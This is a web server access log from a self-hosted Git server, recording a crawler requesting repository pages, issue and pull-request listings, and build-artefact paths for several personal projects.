"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118426] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/tags.rss" [Client 74.7.227.38] [Length 345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/tags" +[17/Feb/2026:19:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPostgresPatrol.pkg" [Client 74.7.227.38] [Length 19798] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:19:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 24136] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:19:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11258] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:19:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11311] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:19:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:19:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:19:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11431] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11434] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:19:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:19:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11402] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:19:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:19:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 59995] [Gzip 16.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:19:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12278] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:19:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:19:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 